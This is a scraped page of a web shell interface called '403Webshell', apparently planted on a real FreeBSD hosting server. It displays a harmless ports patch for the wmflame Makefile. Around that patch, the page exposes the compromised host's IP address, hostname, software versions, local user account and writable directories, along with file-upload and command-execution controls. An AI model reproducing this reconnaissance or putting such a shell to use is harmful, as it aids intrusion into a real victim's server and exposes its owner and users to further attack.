403Webshell
Server IP : 82.208.35.60  /  Your IP : 216.73.217.33
Web Server : Apache/2.4.55 (FreeBSD) OpenSSL/1.1.1q-freebsd PHP/7.3.31
System : FreeBSD server7.d2m.cz 12.4-RELEASE-p9 FreeBSD 12.4-RELEASE-p9 GENERIC amd64
User : studiokobylisy_cz ( 1008)
PHP Version : 7.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/ports/sysutils/wmflame/files/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/ports/sysutils/wmflame/files/patch-Makefile
--- Makefile.orig	Tue Jun 15 17:11:20 1999
+++ Makefile	Thu May 16 11:38:12 2002
@@ -1,21 +1,20 @@
-INCDIR	=	-I/usr/X11R6/include
-LIBDIR	=	-L/usr/X11R6/lib
-LIBS	=	-lXpm -lXext -lX11
-OBJS	=	wmflame.o ../wmgeneral/wmgeneral.o 
+CC ?= gcc
+CFLAGS += -c -Wall
+INCDIR = -I${LOCALBASE}/include
+LIBDIR = -L${LOCALBASE}/lib
+LIBS   = -lXpm -lXext -lX11
+OBJS =  wmflame.o ../wmgeneral/wmgeneral.o
 
 .c.o:
-	cc -c -g -O3 -Wall -D$(shell echo `uname -s`) $< -o $*.o $(INCDIR)
-
-all: wmflame
+	${CC} ${CFLAGS} ${INCDIR} -D${shell echo `uname -s`} $< -o $*.o
 
 wmflame: $(OBJS)
-	cc -o wmflame $^ $(LIBDIR) $(LIBS)
+	${CC} -o wmflame $^ ${LIBDIR} ${LIBS}
+
+all: wmflame
 
 clean:
-	for i in $(OBJS) ; do \
+	for i in ${OBJS}; do \
 		rm -f $$i; \
 	done
-	rm -f wmflame
-
-install:
-	mv wmflame /usr/local/bin
+	rm -f wmflame core

Youez - 2016 - github.com/yon3zu
LinuXploit